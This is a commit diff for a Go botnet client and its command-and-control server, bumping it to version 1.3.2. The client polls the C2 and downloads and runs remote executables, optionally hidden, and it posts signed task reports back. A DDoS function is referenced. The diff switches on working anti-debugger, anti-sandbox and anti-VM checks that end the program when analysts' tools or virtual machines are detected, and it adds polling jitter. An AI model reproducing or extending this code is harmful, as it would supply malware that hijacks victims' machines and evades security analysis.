⚡ Update v1.3.2

1. Add task logs function
2. Update cancel task function
3. Add anti-vm, anti-sandbox and anti-debugger features

Author: unknown

.gitignore

@@ -6,4 +6,5 @@
 /server/.vscode/
 /test/
 /pic/
-/server/*.exe
+/server/*.exe
+/server/Log/

README.md

@@ -5,6 +5,8 @@ Misuse of this software may violate laws. Read the disclaimer below before using
 
 # 📌 Features
 1. Remote Download Execute: It could execute a local executable or download from remote host and execute
+2. Evasion: anti-vm, anti-sandbox and anti-debugger features
+3. Task logs: It could record task status and manage it or export it.
 
 # 📄 License
 MIT License  

client/components/core.go

@@ -1,8 +1,10 @@
 package components
 
 import (
+	"encoding/json"
 	"log"
 	"os"
+	"strconv"
 	"strings"
 	"time"
 
@@ -14,25 +16,54 @@ func do_register_bot(pkg *ServerReply, host string) bool {
 }
 
 func do_remote_download_execute(pkg *ServerReply, host string) bool {
-	commandline := pkg.Args["args"]
-	strArgs := strings.Fields(commandline.(string))
-	option := ""
+	commandline := pkg.Args["args"].(string)
+	hidden := pkg.Args["hidden"].(bool)
+	action := commandline
+	if hidden {
+		action += " (hidden)"
+	}
 
 	// Collect options if it exists
+	option := ""
+	strArgs := strings.Fields(commandline)
 	if len(strArgs) > 1 {
 		for i := 1; i < len(strArgs); i++ {
 			option += (strArgs[i] + " ")
 		}
 		option = strings.TrimSpace(option)
 	}
 	// Remote download and execute
-	ok := remote_execute(strArgs[0], pkg.Args["hidden"].(bool), option)
+	ok := remote_execute(strArgs[0], hidden, option)
+	error1 := "failed"
+	if ok {
+		error1 = "done"
+	}
 
-	var reply ServerReply
-	reply.Args = make(map[string]any)
-	reply.Headers = make(map[string]string)
+	report := Report{
+		Guid:    g_guid,
+		TaskID:  strconv.FormatInt(pkg.TaskId, 10),
+		Success: ok,
+		Output:  "",
+		Error:   error1,
+		Extra:   make(map[string]any),
+	}
+	report.Extra["action"] = action
+	byt, _ := json.Marshal(report)
+	// Send report to C2
+
+	// Build url
+	url := build_url(host, "/report", botcore.use_ssl)
+	// Calculate signature
+	timestamp := generate_utc_timestamp_string()
+	sign := create_sign(g_token, g_guid, timestamp)
+	// Send HTTP POST request
+	do_head_post(url, byt, map[string]string{
+		"X-Guid": g_guid,
+		"X-Time": timestamp,
+		"X-Sign": base64_enc(sign),
+	}, botcore.use_ssl)
 
-	return
+	return true
 }
 
 func do_ddos_attack(pkg *ServerReply, host string) bool {
@@ -64,10 +95,8 @@ func send_poll_request(host string) BotState {
 	url := build_url(host, "/poll", botcore.use_ssl)
 
 	// Hmac calculation
-	bytTokens, _ := base64_dec(g_token)
 	timestamp := generate_utc_timestamp_string()
-	data := []byte(g_guid + timestamp)
-	sign := hmac_sha256(bytTokens, data)
+	sign := create_sign(g_token, g_guid, timestamp)
 
 	// Send poll request
 	reply := do_head_post(url, nil, map[string]string{
@@ -153,11 +182,8 @@ func handle_command() {
 	var stat BotState = StateReadGuid
 
 	for {
-		// time.Sleep(time.Second * time.Duration(random_int(1, 5)))
+		time.Sleep(time.Second * time.Duration(random_int(1, 5)))
 		stat = auth_bot_poll(stat, botcore.hosts[0])
-		// for _, host := range botcore.hosts {
-
-		// }
 	}
 
 }
@@ -172,17 +198,17 @@ func Run() {
 	time.Sleep(time.Second * time.Duration(botcore.delay))
 
 	// Try to fuck them all
-	// if botcore.anti_debug && is_debugger_exist() {
-	// 	return
-	// }
+	if botcore.anti_debug && is_debugger_exist() {
+		return
+	}
 
-	// if botcore.anti_sandbox && in_sandbox_now() {
-	// 	return
-	// }
+	if botcore.anti_sandbox && in_sandbox_now() {
+		return
+	}
 
-	// if botcore.anti_vm && in_vm_now() {
-	// 	return
-	// }
+	if botcore.anti_vm && in_vm_now() {
+		return
+	}
 
 	// Install self
 	// if botcore.install {

client/components/crypto.go

@@ -29,3 +29,10 @@ func hmac_sha256(key, data []byte) []byte {
 	mac.Write(data)
 	return mac.Sum(nil)
 }
+
+// Create sha256-based HMAC
+func create_sign(token string, guid string, timestamp string) []byte {
+	bytToken, _ := base64_dec(token)
+	data := []byte(guid + timestamp)
+	return hmac_sha256(bytToken, data)
+}

client/components/evasion.go

@@ -1,25 +1,108 @@
 package components
 
-func is_debugger_exist() bool {
-	ret, _, _ := pfnIsDebuggerPresent.Call()
-	if ret != 0 {
-		return true
-	}
+import (
+	"os"
+	"os/exec"
+	"os/user"
+	"runtime"
+	"strings"
+)
 
-	for i := 0; i < len(debuggers); i++ {
-		if find_process_by_name(debuggers[i]) {
+func is_debugger_exist() bool {
+	if runtime.GOOS == "windows" {
+		ret, _, _ := pfnIsDebuggerPresent.Call()
+		if ret != 0 {
 			return true
 		}
+
+		for i := 0; i < len(debuggers); i++ {
+			if find_process_by_name(debuggers[i]) {
+				return true
+			}
+		}
+	} else {
+		// linux
+		data, err := os.ReadFile("/proc/self/status")
+		if err != nil {
+			return false
+		}
+		lines := strings.Split(string(data), "\n")
+		for _, line := range lines {
+			if strings.HasPrefix(line, "TracerPid:") {
+				fields := strings.Fields(line)
+				if len(fields) == 2 && fields[1] != "0" {
+					return true
+				}
+			}
+		}
+
 	}
 
 	return false
 }
 
 func in_sandbox_now() bool {
+	if runtime.GOOS == "windows" {
+		// Check username
+		user := os.Getenv("USERNAME")
+		sandboxUsers := []string{"sandbox", "test", "malware", "analyst"}
+		for _, bad := range sandboxUsers {
+			if strings.Contains(strings.ToLower(user), bad) {
+				return true
+			}
+		}
+		// Check senstive process
+		cmd := exec.Command("tasklist")
+		out, err := cmd.Output()
+		if err != nil {
+			return false
+		}
+		sandboxProcs := []string{"vmsrvc.exe", "vmtoolsd.exe", "vboxservice.exe", "vboxtray.exe", "wireshark.exe"}
+		output := strings.ToLower(string(out))
+		for _, proc := range sandboxProcs {
+			if strings.Contains(output, proc) {
+				return true
+			}
+		}
+	} else {
+		// Linux
+		u, err := user.Current()
+		if err == nil {
+			low := strings.ToLower(u.Username)
+			return strings.Contains(low, "sandbox") || strings.Contains(low, "test") || strings.Contains(low, "malware")
+		}
+	}
 	return false
 }
 
 func in_vm_now() bool {
+	if runtime.GOOS == "windows" {
+		cmd := exec.Command("powershell", "-Command", "Get-CimInstance Win32_ComputerSystem | Select-Object Manufacturer, Model")
+		out, err := cmd.Output()
+		if err != nil {
+			return false
+		}
+		lower := strings.ToLower(string(out))
+		vmSigns := []string{"vmware", "virtualbox", "kvm", "xen", "qemu", "hyper-v"}
+		for _, s := range vmSigns {
+			if strings.Contains(lower, s) {
+				return true
+			}
+		}
+	} else {
+		// Linux
+		data, err := os.ReadFile("/sys/class/dmi/id/product_name")
+		if err != nil {
+			return false
+		}
+		content := strings.ToLower(string(data))
+		indicators := []string{"kvm", "virtualbox", "vmware", "qemu"}
+		for _, key := range indicators {
+			if strings.Contains(content, key) {
+				return true
+			}
+		}
+	}
 	return false
 }
 

client/components/global.go

@@ -73,7 +73,7 @@ var (
 	pfnGetCurrentProcess   = kernel32.NewProc("GetCurrentProcess")
 
 	botcore = BotCore{
-		version:      "1.2.1",
+		version:      "1.3.2",
 		hosts:        []string{"127.0.0.1:8080"},
 		singleton:    true,
 		anti_debug:   false,

server/common/global.go

@@ -11,8 +11,8 @@ var (
 	Seed               = rand.New(rand.NewSource(time.Now().UnixNano()))
 	Cfg                = Config{}
 	Db         *sql.DB = nil
-	Version            = "v1.2.1"
-	Account            = ""
+	Version            = "v1.3.2"
+	Account            = 0
 	CurrentBot int64   = 5
 	Mutex      sync.Mutex
 )
@@ -42,6 +42,15 @@ type Config struct {
 	} `yaml:"auth"`
 }
 
+type Report struct {
+	Guid    string         `json:"guid"`
+	TaskID  string         `json:"task_id"`
+	Success bool           `json:"success"`
+	Output  string         `json:"output"`
+	Error   string         `json:"error"`
+	Extra   map[string]any `json:"extra"`
+}
+
 type Client struct {
 	Id          int    `json:"id"`
 	Guid        string `json:"guid"`

server/config.yaml

@@ -9,7 +9,7 @@ database:
   name: thisbot
 log:
   enabled: true
-  output: stdout
+  output: file
   filepath: ./Log/config.yaml
   level: info
 auth: